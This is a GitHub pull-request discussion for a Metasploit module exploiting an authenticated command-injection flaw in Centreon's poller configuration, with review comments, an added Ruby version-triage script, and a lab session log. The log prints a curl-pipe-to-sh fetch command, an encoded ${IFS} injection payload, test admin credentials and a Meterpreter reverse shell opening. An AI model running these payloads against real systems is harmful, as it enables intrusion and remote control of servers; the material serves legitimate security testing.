
Conversation

@h00die-gr3y

Centreon is a platform designed to monitor your cloud and on-premises infrastructure.
This module exploits a command injection vulnerability using the broker engine reload setting on the poller configuration page of the Centreon web application. Injecting a malicious payload at the broker engine reload parameter and restarting the poller triggers this vulnerability.
You need to have admin access to the Centreon Web application in order to execute this RCE.

This issue affects all Centreon editions >= 19.10.0 and it is fixed in Centreon Web versions 24.10.13, 24.04.18 and 23.10.28.
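The affected range stated above is easy to get wrong when triaging an inventory by hand, because the fix landed in three separate branches. The Ruby script below is an added example (not part of this PR or of the Metasploit module) that encodes exactly the range given in the description: every edition from 19.10.0 up to, but not including, the fixed release of its branch (24.10.13, 24.04.18, 23.10.28). The branch rule, the `:unknown` result for branches newer than any listed fix, and all version strings in the comments are assumptions of this example, not statements from the PR.

```ruby
# Added example, not part of the PR or the module: classify a Centreon Web
# version string against the affected range given in the PR description.
#
# Rules encoded (assumptions of this example where the description is silent):
#   * versions below 19.10.0                    -> :unaffected
#   * branch has a listed fix, version >= fix   -> :fixed
#   * branch has a listed fix, version <  fix   -> :affected
#   * branch has no listed fix, version older
#     than the newest listed fix (e.g. 22.10.x) -> :affected (description says
#                                                  "all editions >= 19.10.0")
#   * branch newer than every listed fix        -> :unknown (not covered by
#                                                  the description)
require 'rubygems' # Gem::Version, for correct numeric comparison of "24.04.18" vs "24.10.13"

FIRST_AFFECTED = Gem::Version.new('19.10.0')
FIXED_RELEASES = %w[24.10.13 24.04.18 23.10.28].map { |v| Gem::Version.new(v) }.freeze
NEWEST_FIX     = FIXED_RELEASES.max

# Major.minor branch of a version, e.g. "24.10" for 24.10.13.
# Gem::Version drops the leading zero of "04", so 24.04.x and 24.4.x agree.
def branch_of(version)
  version.segments[0, 2].join('.')
end

# Returns :unaffected, :affected, :fixed or :unknown for a version string.
# Raises ArgumentError for strings that are not version numbers.
def centreon_status(version_string)
  version = Gem::Version.new(version_string.to_s.strip)
  return :unaffected if version < FIRST_AFFECTED

  fix = FIXED_RELEASES.find { |f| branch_of(f) == branch_of(version) }
  if fix
    version >= fix ? :fixed : :affected
  elsif version > NEWEST_FIX
    :unknown
  else
    :affected
  end
end

# Summarise a list of (host, version) pairs, e.g. from an asset inventory.
# Hosts whose version string cannot be parsed are reported under :invalid.
def triage(inventory)
  inventory.each_with_object(Hash.new { |h, k| h[k] = [] }) do |(host, ver), acc|
    status = begin
      centreon_status(ver)
    rescue ArgumentError
      :invalid
    end
    acc[status] << host
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample inventory for a stand-alone run.
  sample = [['mon-01', '23.04.5'], ['mon-02', '24.10.12'], ['mon-03', '24.10.13'],
            ['mon-04', '19.04.2'], ['mon-05', '25.04.0'], ['mon-06', 'n/a']]
  triage(sample).each { |status, hosts| puts "#{status}: #{hosts.join(', ')}" }
end
```

Note that the module's own check in the session log further down reports version 23.04.5 as "not exploitable", while the description's range (all editions >= 19.10.0) puts that version inside the affected set; this script follows the description, so treat a `:affected` result as "patch or verify", not as proof that a given build is exploitable.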


# login at the Centreon web application
# return true if login successful else false
def centreon_login(name, pwd)

It'd be lovely to have this in a mixin, as there are already 3 modules targeting Centreon.


I'd agree here, I think we have a non-written rule that if 3 modules are doing something similar it should be a mixin.


# get the Centreon version
# return version if successful else nil
def get_centreon_version

This would also be great to have in a mixin <3


@dledda-r7 dledda-r7 left a comment


Hello @h00die-gr3y,
Thanks for your module, I've left a review and I will set up the target to test the exploit.



@dledda-r7

dledda-r7 commented Nov 4, 2025

msf exploit(linux/http/centreon_auth_rce_cve_2025_5946) > run
[*] Command served: curl -so ./YXGJJaXKVqC http://192.168.136.136:8080/pvW_jshTHEZq9kXYRjnS7Q;chmod +x ./YXGJJaXKVqC;./YXGJJaXKVqC&
[*] Command to run on remote host: curl -s http://192.168.136.136:8080/Vhk3Bl7ijhfaGKIdPGCtzg|sh
[*] Fetch handler listening on 192.168.136.136:8080
[*] HTTP server started
[*] Adding resource /pvW_jshTHEZq9kXYRjnS7Q
[*] Adding resource /Vhk3Bl7ijhfaGKIdPGCtzg
[*] Started reverse TCP handler on 192.168.136.136:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Centreon version 23.04.5 ForceExploit is enabled, proceeding with exploitation.
[*] Trying to log in with admin credentials admin:Centreon!123 at the Centreon Web application.
[*] Succesfully authenticated at the Centreon Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] payload=;echo${IFS}Y3VybCAtcyBodHRwOi8vMTkyLjE2OC4xMzYuMTM2OjgwODAvVmhrM0JsN2lqaGZhR0tJZFBHQ3R6Z3xzaA==|(base64${IFS}--decode||base64${IFS}-d)|sh
[*] centreon_token=d7b1c15bfbce42a5dcc82ba75d1c69f3
[+] Poller setting "broker_reload_command" updated with payload.
[*] Client 192.168.136.146 requested /Vhk3Bl7ijhfaGKIdPGCtzg
[*] Sending payload to 192.168.136.146 (curl/7.61.1)
[*] Client 192.168.136.146 requested /pvW_jshTHEZq9kXYRjnS7Q
[*] Sending payload to 192.168.136.146 (curl/7.61.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.136.146
[*] Meterpreter session 1 opened (192.168.136.136:4444 -> 192.168.136.146:36554) at 2025-11-04 08:48:30 -0500

[*] Cleaning up the mess...
[*] centreon_token=5adae970c66bef1f1b214512e93ba775
[+] Poller setting "broker_reload_command" updated with payload.
[+] Payload has been successfully removed from the poller setting "broker_reload_command".

meterpreter > 
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 8.8 (Linux 4.18.0-477.13.1.el8_8.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: apache
meterpreter > 

My version in theory is not exploitable but this looks like a nice shell 🐚

@dledda-r7 dledda-r7 merged commit 110cb83 into rapid7:master Nov 5, 2025
18 checks passed
@h00die-gr3y h00die-gr3y deleted the centreon_auth_rce branch November 6, 2025 07:48

4 participants